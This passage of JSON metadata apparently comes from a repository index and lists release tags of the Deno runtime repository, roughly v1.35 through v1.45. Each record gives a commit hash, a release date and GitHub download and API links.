5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07